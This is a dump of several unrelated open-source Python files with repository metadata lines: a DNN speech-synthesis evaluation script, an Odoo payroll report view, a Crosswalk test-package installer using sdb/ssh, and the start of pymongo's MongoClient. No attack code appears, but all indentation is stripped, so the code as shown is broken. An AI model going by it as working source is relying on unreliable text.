ref_bap_list = prepare_file_path_list(gen_file_id_list, ref_data_dir, cfg.bap_ext)
ref_lf0_list = prepare_file_path_list(gen_file_id_list, ref_data_dir, cfg.lf0_ext)
in_gen_label_align_file_list = in_label_align_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
calculator = IndividualDistortionComp()
spectral_distortion = 0.0
bap_mse = 0.0
f0_mse = 0.0
vuv_error = 0.0
valid_file_id_list = file_id_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number]
test_file_id_list = file_id_list[cfg.train_file_number+cfg.valid_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
if cfg.remove_silence_using_binary_labels:
## get lab_dim:
label_composer = LabelComposer()
label_composer.load_label_configuration(cfg.label_config_file)
lab_dim=label_composer.compute_label_dimension()
## use first feature in label -- hardcoded for now
silence_feature = 0
## Use these to trim silence:
untrimmed_test_labels = binary_label_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
if 'mgc' in cfg.in_dimension_dict:
if cfg.remove_silence_using_binary_labels:
untrimmed_reference_data = in_file_list_dict['mgc'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
trim_silence(untrimmed_reference_data, ref_mgc_list, cfg.mgc_dim, \
untrimmed_test_labels, lab_dim, silence_feature)
else:
remover = SilenceRemover(n_cmp = cfg.mgc_dim, silence_pattern = ['*-#+*'])
remover.remove_silence(in_file_list_dict['mgc'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number], in_gen_label_align_file_list, ref_mgc_list)
valid_spectral_distortion = calculator.compute_distortion(valid_file_id_list, ref_data_dir, gen_dir, cfg.mgc_ext, cfg.mgc_dim)
test_spectral_distortion = calculator.compute_distortion(test_file_id_list , ref_data_dir, gen_dir, cfg.mgc_ext, cfg.mgc_dim)
valid_spectral_distortion *= (10 /numpy.log(10)) * numpy.sqrt(2.0) ##MCD
test_spectral_distortion *= (10 /numpy.log(10)) * numpy.sqrt(2.0) ##MCD
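## conversion to mel-cepstral distortion in dB -- a sketch, assuming the
## calculator returns the per-frame RMS of the cepstral difference:
## MCD = (10 / ln 10) * sqrt(2 * sum_d (c_d - c'_d)^2),
## hence the constant factor (10/ln10)*sqrt(2) applied above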
if 'bap' in cfg.in_dimension_dict:
if cfg.remove_silence_using_binary_labels:
untrimmed_reference_data = in_file_list_dict['bap'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
trim_silence(untrimmed_reference_data, ref_bap_list, cfg.bap_dim, \
untrimmed_test_labels, lab_dim, silence_feature)
else:
remover = SilenceRemover(n_cmp = cfg.bap_dim, silence_pattern = ['*-#+*'])
remover.remove_silence(in_file_list_dict['bap'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number], in_gen_label_align_file_list, ref_bap_list)
valid_bap_mse = calculator.compute_distortion(valid_file_id_list, ref_data_dir, gen_dir, cfg.bap_ext, cfg.bap_dim)
test_bap_mse = calculator.compute_distortion(test_file_id_list , ref_data_dir, gen_dir, cfg.bap_ext, cfg.bap_dim)
valid_bap_mse = valid_bap_mse / 10.0 ## Cassia's bap is computed from 10*log|S(w)|; if using HTS/SPTK style, do the same as for MGC
test_bap_mse = test_bap_mse / 10.0 ## Cassia's bap is computed from 10*log|S(w)|; if using HTS/SPTK style, do the same as for MGC
if 'lf0' in cfg.in_dimension_dict:
if cfg.remove_silence_using_binary_labels:
untrimmed_reference_data = in_file_list_dict['lf0'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
trim_silence(untrimmed_reference_data, ref_lf0_list, cfg.lf0_dim, \
untrimmed_test_labels, lab_dim, silence_feature)
else:
remover = SilenceRemover(n_cmp = cfg.lf0_dim, silence_pattern = ['*-#+*'])
remover.remove_silence(in_file_list_dict['lf0'][cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number], in_gen_label_align_file_list, ref_lf0_list)
valid_f0_mse, valid_vuv_error = calculator.compute_distortion(valid_file_id_list, ref_data_dir, gen_dir, cfg.lf0_ext, cfg.lf0_dim)
test_f0_mse , test_vuv_error = calculator.compute_distortion(test_file_id_list , ref_data_dir, gen_dir, cfg.lf0_ext, cfg.lf0_dim)
logger.info('Develop: DNN -- MCD: %.3f dB; BAP: %.3f dB; F0: %.3f Hz; VUV: %.3f%%' \
%(valid_spectral_distortion, valid_bap_mse, valid_f0_mse, valid_vuv_error*100.))
logger.info('Test : DNN -- MCD: %.3f dB; BAP: %.3f dB; F0: %.3f Hz; VUV: %.3f%%' \
%(test_spectral_distortion , test_bap_mse , test_f0_mse , test_vuv_error*100.))
# this can be removed
#
if 0: #to calculate distortion of HMM baseline
hmm_gen_no_silence_dir = '/afs/inf.ed.ac.uk/group/project/dnn_tts/data/nick/nick_hmm_pf_2400_no_silence'
hmm_gen_dir = '/afs/inf.ed.ac.uk/group/project/dnn_tts/data/nick/nick_hmm_pf_2400'
if 1:
hmm_mgc_list = prepare_file_path_list(gen_file_id_list, hmm_gen_dir, cfg.mgc_ext)
hmm_bap_list = prepare_file_path_list(gen_file_id_list, hmm_gen_dir, cfg.bap_ext)
hmm_lf0_list = prepare_file_path_list(gen_file_id_list, hmm_gen_dir, cfg.lf0_ext)
hmm_mgc_no_silence_list = prepare_file_path_list(gen_file_id_list, hmm_gen_no_silence_dir, cfg.mgc_ext)
hmm_bap_no_silence_list = prepare_file_path_list(gen_file_id_list, hmm_gen_no_silence_dir, cfg.bap_ext)
hmm_lf0_no_silence_list = prepare_file_path_list(gen_file_id_list, hmm_gen_no_silence_dir, cfg.lf0_ext)
in_gen_label_align_file_list = in_label_align_file_list[cfg.train_file_number:cfg.train_file_number+cfg.valid_file_number+cfg.test_file_number]
remover = SilenceRemover(n_cmp = cfg.mgc_dim, silence_pattern = ['*-#+*'])
remover.remove_silence(hmm_mgc_list, in_gen_label_align_file_list, hmm_mgc_no_silence_list)
remover = SilenceRemover(n_cmp = cfg.bap_dim, silence_pattern = ['*-#+*'])
remover.remove_silence(hmm_bap_list, in_gen_label_align_file_list, hmm_bap_no_silence_list)
remover = SilenceRemover(n_cmp = cfg.lf0_dim, silence_pattern = ['*-#+*'])
remover.remove_silence(hmm_lf0_list, in_gen_label_align_file_list, hmm_lf0_no_silence_list)
calculator = IndividualDistortionComp()
spectral_distortion = calculator.compute_distortion(valid_file_id_list, ref_data_dir, hmm_gen_no_silence_dir, cfg.mgc_ext, cfg.mgc_dim)
bap_mse = calculator.compute_distortion(valid_file_id_list, ref_data_dir, hmm_gen_no_silence_dir, cfg.bap_ext, cfg.bap_dim)
f0_mse, vuv_error = calculator.compute_distortion(valid_file_id_list, ref_data_dir, hmm_gen_no_silence_dir, cfg.lf0_ext, cfg.lf0_dim)
spectral_distortion *= (10 /numpy.log(10)) * numpy.sqrt(2.0)
bap_mse = bap_mse / 10.0
logger.info('Develop: HMM -- MCD: %.3f dB; BAP: %.3f dB; F0: %.3f Hz; VUV: %.3f%%' %(spectral_distortion, bap_mse, f0_mse, vuv_error*100.))
spectral_distortion = calculator.compute_distortion(test_file_id_list, ref_data_dir, hmm_gen_no_silence_dir, cfg.mgc_ext, cfg.mgc_dim)
bap_mse = calculator.compute_distortion(test_file_id_list, ref_data_dir, hmm_gen_no_silence_dir, cfg.bap_ext, cfg.bap_dim)
f0_mse, vuv_error = calculator.compute_distortion(test_file_id_list, ref_data_dir, hmm_gen_no_silence_dir, cfg.lf0_ext, cfg.lf0_dim)
spectral_distortion *= (10 /numpy.log(10)) * numpy.sqrt(2.0)
bap_mse = bap_mse / 10.0
logger.info('Test : HMM -- MCD: %.3f dB; BAP: %.3f dB; F0: %.3f Hz; VUV: %.3f%%' %(spectral_distortion, bap_mse, f0_mse, vuv_error*100.))
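# Note (sketch): the factor (10/numpy.log(10)) * numpy.sqrt(2.0) ~= 6.142 applied above
# converts a root-mean-square cepstral distance into mel-cepstral distortion (MCD) in dB:
#   MCD = (10 / ln 10) * sqrt(2 * sum_d (c_d - c'_d)^2)
# assuming compute_distortion() returns the root of the summed squared MGC error.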
if __name__ == '__main__':
# these things should be done even before trying to parse the command line
# create a configuration instance
# and get a short name for this instance
cfg=configuration.cfg
# set up logging to use our custom class
logging.setLoggerClass(LoggerPlotter)
# get a logger for this main function
logger = logging.getLogger("main")
if len(sys.argv) != 2:
logger.critical('usage: run_dnn.sh [config file name]')
sys.exit(1)
config_file = sys.argv[1]
config_file = os.path.abspath(config_file)
cfg.configure(config_file)
if cfg.profile:
logger.info('profiling is activated')
import cProfile, pstats
cProfile.run('main_function(cfg)', 'mainstats')
# create a stream for the profiler to write to
profiling_output = io.StringIO()
p = pstats.Stats('mainstats', stream=profiling_output)
# print stats to that stream
# here we just report the top 10 functions, sorted by total amount of time spent in each
p.strip_dirs().sort_stats('tottime').print_stats(10)
# print the result to the log
logger.info('---Profiling result follows---\n%s' % profiling_output.getvalue() )
profiling_output.close()
logger.info('---End of profiling result---')
else:
main_function(cfg)
sys.exit(0)
| apache-2.0 |
Antiun/odoo | addons/l10n_in_hr_payroll/report/payment_advice_report.py | 340 | 3967 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2012-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp import tools
from openerp.osv import fields, osv
class payment_advice_report(osv.osv):
_name = "payment.advice.report"
_description = "Payment Advice Analysis"
_auto = False
_columns = {
'name':fields.char('Name', readonly=True),
'date': fields.date('Date', readonly=True,),
'year': fields.char('Year', size=4, readonly=True),
'month': fields.selection([('01', 'January'), ('02', 'February'), ('03', 'March'), ('04', 'April'),
('05', 'May'), ('06', 'June'), ('07', 'July'), ('08', 'August'), ('09', 'September'),
('10', 'October'), ('11', 'November'), ('12', 'December')], 'Month', readonly=True),
'day': fields.char('Day', size=128, readonly=True),
'state':fields.selection([
('draft', 'Draft'),
('confirm', 'Confirmed'),
('cancel', 'Cancelled'),
], 'Status', select=True, readonly=True),
'employee_id': fields.many2one('hr.employee', 'Employee', readonly=True),
'nbr': fields.integer('# Payment Lines', readonly=True),
'number':fields.char('Number', readonly=True),
'bysal': fields.float('By Salary', readonly=True),
'bank_id':fields.many2one('res.bank', 'Bank', readonly=True),
'company_id':fields.many2one('res.company', 'Company', readonly=True),
'cheque_nos':fields.char('Cheque Numbers', readonly=True),
'neft': fields.boolean('NEFT Transaction', readonly=True),
'ifsc_code': fields.char('IFSC Code', size=32, readonly=True),
'employee_bank_no': fields.char('Employee Bank Account', required=True),
}
def init(self, cr):
tools.drop_view_if_exists(cr, 'payment_advice_report')
cr.execute("""
create or replace view payment_advice_report as (
select
min(l.id) as id,
sum(l.bysal) as bysal,
p.name,
p.state,
p.date,
p.number,
p.company_id,
p.bank_id,
p.chaque_nos as cheque_nos,
p.neft,
l.employee_id,
l.ifsc_code,
l.name as employee_bank_no,
to_char(p.date, 'YYYY') as year,
to_char(p.date, 'MM') as month,
to_char(p.date, 'YYYY-MM-DD') as day,
1 as nbr
from
hr_payroll_advice as p
left join hr_payroll_advice_line as l on (p.id=l.advice_id)
where
l.employee_id IS NOT NULL
group by
p.number,p.name,p.date,p.state,p.company_id,p.bank_id,p.chaque_nos,p.neft,
l.employee_id,l.advice_id,l.bysal,l.ifsc_code, l.name
)
""")
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
XiaosongWei/crosswalk-test-suite | webapi/tct-text-css3-tests/inst.wgt.py | 372 | 6809 | #!/usr/bin/env python
import os
import shutil
import glob
import time
import sys
import subprocess
import string
from optparse import OptionParser, make_option
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
PKG_NAME = os.path.basename(SCRIPT_DIR)
PARAMETERS = None
#XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/5000/dbus/user_bus_socket"
SRC_DIR = ""
PKG_SRC_DIR = ""
def doCMD(cmd):
# Do not need handle timeout in this short script, let tool do it
print "-->> \"%s\"" % cmd
output = []
cmd_return_code = 1
cmd_proc = subprocess.Popen(
cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, shell=True)
while True:
output_line = cmd_proc.stdout.readline().strip("\r\n")
cmd_return_code = cmd_proc.poll()
if output_line == '' and cmd_return_code is not None:
break
sys.stdout.write("%s\n" % output_line)
sys.stdout.flush()
output.append(output_line)
return (cmd_return_code, output)
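# Example (sketch): doCMD returns a (return_code, output_lines) tuple, e.g.
#   (rc, out) = doCMD("sdb devices")
#   if rc == 0:
#       print "devices:", out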
def updateCMD(cmd=None):
if "pkgcmd" in cmd:
cmd = "su - %s -c '%s;%s'" % (PARAMETERS.user, XW_ENV, cmd)
return cmd
def getUSERID():
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell id -u %s" % (
PARAMETERS.device, PARAMETERS.user)
else:
cmd = "ssh %s \"id -u %s\"" % (
PARAMETERS.device, PARAMETERS.user)
return doCMD(cmd)
def getPKGID(pkg_name=None):
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell %s" % (
PARAMETERS.device, updateCMD('pkgcmd -l'))
else:
cmd = "ssh %s \"%s\"" % (
PARAMETERS.device, updateCMD('pkgcmd -l'))
(return_code, output) = doCMD(cmd)
if return_code != 0:
return None
test_pkg_id = None
for line in output:
if line.find("[" + pkg_name + "]") != -1:
pkgidIndex = line.split().index("pkgid")
test_pkg_id = line.split()[pkgidIndex + 1].strip("[]")
break
return test_pkg_id
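# Parsing assumption (sketch): getPKGID expects `pkgcmd -l` lines of the form
#   pkg_type [wgt]   pkgid [SomeId]   name [tct-text-css3-tests]   ...
# and returns the token that follows "pkgid" with the brackets stripped.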
def doRemoteCMD(cmd=None):
if PARAMETERS.mode == "SDB":
cmd = "sdb -s %s shell %s" % (PARAMETERS.device, updateCMD(cmd))
else:
cmd = "ssh %s \"%s\"" % (PARAMETERS.device, updateCMD(cmd))
return doCMD(cmd)
def doRemoteCopy(src=None, dest=None):
if PARAMETERS.mode == "SDB":
cmd_prefix = "sdb -s %s push" % PARAMETERS.device
cmd = "%s %s %s" % (cmd_prefix, src, dest)
else:
cmd = "scp -r %s %s:/%s" % (src, PARAMETERS.device, dest)
(return_code, output) = doCMD(cmd)
doRemoteCMD("sync")
if return_code != 0:
return True
else:
return False
def uninstPKGs():
action_status = True
for root, dirs, files in os.walk(SCRIPT_DIR):
if root.endswith("mediasrc"):
continue
for file in files:
if file.endswith(".wgt"):
pkg_id = getPKGID(os.path.basename(os.path.splitext(file)[0]))
if not pkg_id:
action_status = False
continue
(return_code, output) = doRemoteCMD(
"pkgcmd -u -t wgt -q -n %s" % pkg_id)
for line in output:
if "Failure" in line:
action_status = False
break
(return_code, output) = doRemoteCMD(
"rm -rf %s" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
return action_status
def instPKGs():
action_status = True
(return_code, output) = doRemoteCMD(
"mkdir -p %s" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
for root, dirs, files in os.walk(SCRIPT_DIR):
if root.endswith("mediasrc"):
continue
for file in files:
if file.endswith(".wgt"):
if not doRemoteCopy(
os.path.join(root, file), "%s/%s" % (SRC_DIR, file)):
action_status = False
(return_code, output) = doRemoteCMD(
"pkgcmd -i -t wgt -q -p %s/%s" % (SRC_DIR, file))
doRemoteCMD("rm -rf %s/%s" % (SRC_DIR, file))
for line in output:
if "Failure" in line:
action_status = False
break
# Do some special copy/delete... steps
'''
(return_code, output) = doRemoteCMD(
"mkdir -p %s/tests" % PKG_SRC_DIR)
if return_code != 0:
action_status = False
if not doRemoteCopy("specname/tests", "%s/tests" % PKG_SRC_DIR):
action_status = False
'''
return action_status
def main():
try:
usage = "usage: inst.py -i"
opts_parser = OptionParser(usage=usage)
opts_parser.add_option(
"-m", dest="mode", action="store", help="Specify mode")
opts_parser.add_option(
"-s", dest="device", action="store", help="Specify device")
opts_parser.add_option(
"-i", dest="binstpkg", action="store_true", help="Install package")
opts_parser.add_option(
"-u", dest="buninstpkg", action="store_true", help="Uninstall package")
opts_parser.add_option(
"-a", dest="user", action="store", help="User name")
global PARAMETERS
(PARAMETERS, args) = opts_parser.parse_args()
except Exception as e:
print "Got wrong option: %s, exit ..." % e
sys.exit(1)
if not PARAMETERS.user:
PARAMETERS.user = "app"
global SRC_DIR, PKG_SRC_DIR
SRC_DIR = "/home/%s/content" % PARAMETERS.user
PKG_SRC_DIR = "%s/tct/opt/%s" % (SRC_DIR, PKG_NAME)
if not PARAMETERS.mode:
PARAMETERS.mode = "SDB"
if PARAMETERS.mode == "SDB":
if not PARAMETERS.device:
(return_code, output) = doCMD("sdb devices")
for line in output:
if str.find(line, "\tdevice") != -1:
PARAMETERS.device = line.split("\t")[0]
break
else:
PARAMETERS.mode = "SSH"
if not PARAMETERS.device:
print "No device provided"
sys.exit(1)
user_info = getUSERID()
re_code = user_info[0]
if re_code == 0:
global XW_ENV
userid = user_info[1][0]
XW_ENV = "export DBUS_SESSION_BUS_ADDRESS=unix:path=/run/user/%s/dbus/user_bus_socket" % str(
userid)
else:
print "[Error] cmd commands error : %s" % str(user_info[1])
sys.exit(1)
if PARAMETERS.binstpkg and PARAMETERS.buninstpkg:
print "-i and -u are conflict"
sys.exit(1)
if PARAMETERS.buninstpkg:
if not uninstPKGs():
sys.exit(1)
else:
if not instPKGs():
sys.exit(1)
if __name__ == "__main__":
main()
sys.exit(0)
| bsd-3-clause |
pdxwebdev/yadapy | yada/lib/python2.7/site-packages/pymongo/mongo_client.py | 5 | 53173 | # Copyright 2009-2015 MongoDB, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you
# may not use this file except in compliance with the License. You
# may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied. See the License for the specific language governing
# permissions and limitations under the License.
"""Tools for connecting to MongoDB.
.. seealso:: :doc:`/examples/high_availability` for examples of connecting
to replica sets or sets of mongos servers.
To get a :class:`~pymongo.database.Database` instance from a
:class:`MongoClient` use either dictionary-style or attribute-style
access:
.. doctest::
>>> from pymongo import MongoClient
>>> c = MongoClient()
>>> c.test_database
Database(MongoClient('localhost', 27017), u'test_database')
>>> c['test-database']
Database(MongoClient('localhost', 27017), u'test-database')
"""
import contextlib
import datetime
import threading
import warnings
import weakref
from collections import defaultdict
from bson.codec_options import DEFAULT_CODEC_OPTIONS
from bson.py3compat import (integer_types,
string_type)
from bson.son import SON
from pymongo import (common,
database,
helpers,
message,
periodic_executor,
uri_parser)
from pymongo.client_options import ClientOptions
from pymongo.cursor_manager import CursorManager
from pymongo.errors import (AutoReconnect,
ConfigurationError,
ConnectionFailure,
InvalidOperation,
InvalidURI,
NetworkTimeout,
NotMasterError,
OperationFailure)
from pymongo.read_preferences import ReadPreference
from pymongo.server_selectors import (writable_preferred_server_selector,
writable_server_selector)
from pymongo.server_type import SERVER_TYPE
from pymongo.topology import Topology
from pymongo.topology_description import TOPOLOGY_TYPE
from pymongo.settings import TopologySettings
from pymongo.write_concern import WriteConcern
class MongoClient(common.BaseObject):
HOST = "localhost"
PORT = 27017
# Define order to retrieve options from ClientOptions for __repr__.
# No host/port; these are retrieved from TopologySettings.
_constructor_args = ('document_class', 'tz_aware', 'connect')
def __init__(
self,
host=None,
port=None,
document_class=dict,
tz_aware=False,
connect=True,
**kwargs):
"""Client for a MongoDB instance, a replica set, or a set of mongoses.
The client object is thread-safe and has connection-pooling built in.
If an operation fails because of a network error,
:class:`~pymongo.errors.ConnectionFailure` is raised and the client
reconnects in the background. Application code should handle this
exception (recognizing that the operation failed) and then continue to
execute.
The `host` parameter can be a full `mongodb URI
<http://dochub.mongodb.org/core/connections>`_, in addition to
a simple hostname. It can also be a list of hostnames or
URIs. Any port specified in the host string(s) will override
the `port` parameter. If multiple mongodb URIs containing
database or auth information are passed, the last database,
username, and password present will be used. In usernames and
passwords, reserved characters such as ':', '/', '+' and '@' must be
percent-escaped following RFC 2396.
.. warning:: When using PyMongo in a multiprocessing context, please
read :ref:`multiprocessing` first.
:Parameters:
- `host` (optional): hostname or IP address of a single mongod or
mongos instance to connect to, or a mongodb URI, or a list of
hostnames / mongodb URIs. If `host` is an IPv6 literal
it must be enclosed in '[' and ']' characters following
the RFC2732 URL syntax (e.g. '[::1]' for localhost). Multihomed
and round robin DNS addresses are **not** supported.
- `port` (optional): port number on which to connect
- `document_class` (optional): default class to use for
documents returned from queries on this client
- `tz_aware` (optional): if ``True``,
:class:`~datetime.datetime` instances returned as values
in a document by this :class:`MongoClient` will be timezone
aware (otherwise they will be naive)
- `connect` (optional): if ``True`` (the default), immediately
begin connecting to MongoDB in the background. Otherwise connect
on the first operation.
| **Other optional parameters can be passed as keyword arguments:**
- `maxPoolSize` (optional): The maximum allowable number of
concurrent connections to each connected server. Requests to a
server will block if there are `maxPoolSize` outstanding
connections to the requested server. Defaults to 100. Cannot be 0.
- `minPoolSize` (optional): The minimum required number of concurrent
connections that the pool will maintain to each connected server.
Default is 0.
- `maxIdleTimeMS` (optional): The maximum number of milliseconds that
a connection can remain idle in the pool before being removed and
replaced. Defaults to `None` (no limit).
- `socketTimeoutMS`: (integer or None) Controls how long (in
milliseconds) the driver will wait for a response after sending an
ordinary (non-monitoring) database operation before concluding that
a network error has occurred. Defaults to ``None`` (no timeout).
- `connectTimeoutMS`: (integer or None) Controls how long (in
milliseconds) the driver will wait during server monitoring when
connecting a new socket to a server before concluding the server
is unavailable. Defaults to ``20000`` (20 seconds).
- `serverSelectionTimeoutMS`: (integer) Controls how long (in
milliseconds) the driver will wait to find an available,
appropriate server to carry out a database operation; while it is
waiting, multiple server monitoring operations may be carried out,
each controlled by `connectTimeoutMS`. Defaults to ``30000`` (30
seconds).
- `waitQueueTimeoutMS`: (integer or None) How long (in milliseconds)
a thread will wait for a socket from the pool if the pool has no
free sockets. Defaults to ``None`` (no timeout).
- `waitQueueMultiple`: (integer or None) Multiplied by maxPoolSize
to give the number of threads allowed to wait for a socket at one
time. Defaults to ``None`` (no limit).
- `socketKeepAlive`: (boolean) Whether to send periodic keep-alive
packets on connected sockets. Defaults to ``False`` (do not send
keep-alive packets).
- `heartbeatFrequencyMS`: (optional) The number of milliseconds
between periodic server checks, or None to accept the default
frequency of 10 seconds.
- `event_listeners`: a list or tuple of event listeners. See
:mod:`~pymongo.monitoring` for details.
| **Write Concern options:**
| (Only set if passed. No default values.)
- `w`: (integer or string) If this is a replica set, write operations
will block until they have been replicated to the specified number
or tagged set of servers. `w=<int>` always includes the replica set
primary (e.g. w=3 means write to the primary and wait until
replicated to **two** secondaries). Passing w=0 **disables write
acknowledgement** and all other write concern options.
- `wtimeout`: (integer) Used in conjunction with `w`. Specify a value
in milliseconds to control how long to wait for write propagation
to complete. If replication does not complete in the given
timeframe, a timeout exception is raised.
- `j`: If ``True`` block until write operations have been committed
to the journal. Cannot be used in combination with `fsync`. Prior
to MongoDB 2.6 this option was ignored if the server was running
without journaling. Starting with MongoDB 2.6 write operations will
fail with an exception if this option is used when the server is
running without journaling.
- `fsync`: If ``True`` and the server is running without journaling,
blocks until the server has synced all data files to disk. If the
server is running with journaling, this acts the same as the `j`
option, blocking until write operations have been committed to the
journal. Cannot be used in combination with `j`.
| **Replica set keyword arguments for connecting with a replica set
- either directly or via a mongos:**
- `replicaSet`: (string or None) The name of the replica set to
connect to. The driver will verify that all servers it connects to
match this name. Implies that the hosts specified are a seed list
and the driver should attempt to find all members of the set.
Defaults to ``None``.
- `read_preference`: The read preference for this client.
See :class:`~pymongo.read_preferences.ReadPreference` for all
available read preference options. Defaults to ``PRIMARY``.
| **SSL configuration:**
- `ssl`: If ``True``, create the connection to the server using SSL.
Defaults to ``False``.
- `ssl_certfile`: The certificate file used to identify the local
connection against mongod. Implies ``ssl=True``. Defaults to
``None``.
- `ssl_keyfile`: The private keyfile used to identify the local
connection against mongod. If included with the ``certfile`` then
only the ``ssl_certfile`` is needed. Implies ``ssl=True``.
Defaults to ``None``.
- `ssl_pem_passphrase`: The password or passphrase for decrypting
the private key in ``ssl_certfile`` or ``ssl_keyfile``. Only
necessary if the private key is encrypted. Only supported by python
2.7.9+ (pypy 2.5.1+) and 3.3+. Defaults to ``None``.
- `ssl_cert_reqs`: Specifies whether a certificate is required from
the other side of the connection, and whether it will be validated
if provided. It must be one of the three values ``ssl.CERT_NONE``
(certificates ignored), ``ssl.CERT_REQUIRED`` (certificates
required and validated), or ``ssl.CERT_OPTIONAL`` (the same as
CERT_REQUIRED, unless the server was configured to use anonymous
ciphers). If the value of this parameter is not ``ssl.CERT_NONE``
and a value is not provided for ``ssl_ca_certs`` PyMongo will
attempt to load system provided CA certificates. If the python
version in use does not support loading system CA certificates
then the ``ssl_ca_certs`` parameter must point to a file of CA
certificates. Implies ``ssl=True``. Defaults to
``ssl.CERT_REQUIRED`` if not provided and ``ssl=True``.
- `ssl_ca_certs`: The ca_certs file contains a set of concatenated
"certification authority" certificates, which are used to validate
certificates passed from the other end of the connection.
Implies ``ssl=True``. Defaults to ``None``.
- `ssl_crlfile`: The path to a PEM or DER formatted certificate
revocation list. Only supported by python 2.7.9+ (pypy 2.5.1+)
and 3.4+. Defaults to ``None``.
- `ssl_match_hostname`: If ``True`` (the default), and
`ssl_cert_reqs` is not ``ssl.CERT_NONE``, enables hostname
verification using the :func:`~ssl.match_hostname` function from
python's :mod:`~ssl` module. Think very carefully before setting
this to ``False`` as that could make your application vulnerable to
man-in-the-middle attacks.
| **Read Concern options:**
| (If not set explicitly, this will use the server default)
- `readConcernLevel`: (string) The read concern level specifies the
level of isolation for read operations. For example, a read
operation using a read concern level of ``majority`` will only
return data that has been written to a majority of nodes. If the
level is left unspecified, the server default will be used.
.. mongodoc:: connections
.. versionchanged:: 3.0
:class:`~pymongo.mongo_client.MongoClient` is now the one and only
client class for a standalone server, mongos, or replica set.
It includes the functionality that had been split into
:class:`~pymongo.mongo_client.MongoReplicaSetClient`: it can connect
to a replica set, discover all its members, and monitor the set for
stepdowns, elections, and reconfigs.
The :class:`~pymongo.mongo_client.MongoClient` constructor no
longer blocks while connecting to the server or servers, and it no
longer raises :class:`~pymongo.errors.ConnectionFailure` if they
are unavailable, nor :class:`~pymongo.errors.ConfigurationError`
if the user's credentials are wrong. Instead, the constructor
returns immediately and launches the connection process on
background threads.
Therefore the ``alive`` method is removed since it no longer
provides meaningful information; even if the client is disconnected,
it may discover a server in time to fulfill the next operation.
In PyMongo 2.x, :class:`~pymongo.MongoClient` accepted a list of
standalone MongoDB servers and used the first it could connect to::
MongoClient(['host1.com:27017', 'host2.com:27017'])
A list of multiple standalones is no longer supported; if multiple
servers are listed they must be members of the same replica set, or
mongoses in the same sharded cluster.
The behavior for a list of mongoses is changed from "high
availability" to "load balancing". Before, the client connected to
the lowest-latency mongos in the list, and used it until a network
error prompted it to re-evaluate all mongoses' latencies and
reconnect to one of them. In PyMongo 3, the client monitors its
network latency to all the mongoses continuously, and distributes
operations evenly among those with the lowest latency. See
:ref:`mongos-load-balancing` for more information.
The ``connect`` option is added.
The ``start_request``, ``in_request``, and ``end_request`` methods
are removed, as well as the ``auto_start_request`` option.
The ``copy_database`` method is removed, see the
:doc:`copy_database examples </examples/copydb>` for alternatives.
The :meth:`MongoClient.disconnect` method is removed; it was a
synonym for :meth:`~pymongo.MongoClient.close`.
:class:`~pymongo.mongo_client.MongoClient` no longer returns an
instance of :class:`~pymongo.database.Database` for attribute names
with leading underscores. You must use dict-style lookups instead::
client['__my_database__']
Not::
client.__my_database__
"""
if host is None:
host = self.HOST
if isinstance(host, string_type):
host = [host]
if port is None:
port = self.PORT
if not isinstance(port, int):
raise TypeError("port must be an instance of int")
seeds = set()
username = None
password = None
dbase = None
opts = {}
for entity in host:
if "://" in entity:
if entity.startswith("mongodb://"):
res = uri_parser.parse_uri(entity, port, warn=True)
seeds.update(res["nodelist"])
username = res["username"] or username
password = res["password"] or password
dbase = res["database"] or dbase
opts = res["options"]
else:
idx = entity.find("://")
raise InvalidURI("Invalid URI scheme: "
"%s" % (entity[:idx],))
else:
seeds.update(uri_parser.split_hosts(entity, port))
if not seeds:
raise ConfigurationError("need to specify at least one host")
# _pool_class, _monitor_class, and _condition_class are for deep
# customization of PyMongo, e.g. Motor.
pool_class = kwargs.pop('_pool_class', None)
monitor_class = kwargs.pop('_monitor_class', None)
condition_class = kwargs.pop('_condition_class', None)
keyword_opts = kwargs
keyword_opts['document_class'] = document_class
keyword_opts['tz_aware'] = tz_aware
keyword_opts['connect'] = connect
# Validate all keyword options.
keyword_opts = dict(common.validate(k, v)
for k, v in keyword_opts.items())
opts.update(keyword_opts)
self.__options = options = ClientOptions(
username, password, dbase, opts)
self.__default_database_name = dbase
self.__lock = threading.Lock()
self.__cursor_manager = None
self.__kill_cursors_queue = []
self._event_listeners = options.pool_options.event_listeners
# Cache of existing indexes used by ensure_index ops.
self.__index_cache = {}
self.__index_cache_lock = threading.Lock()
super(MongoClient, self).__init__(options.codec_options,
options.read_preference,
options.write_concern,
options.read_concern)
self.__all_credentials = {}
creds = options.credentials
if creds:
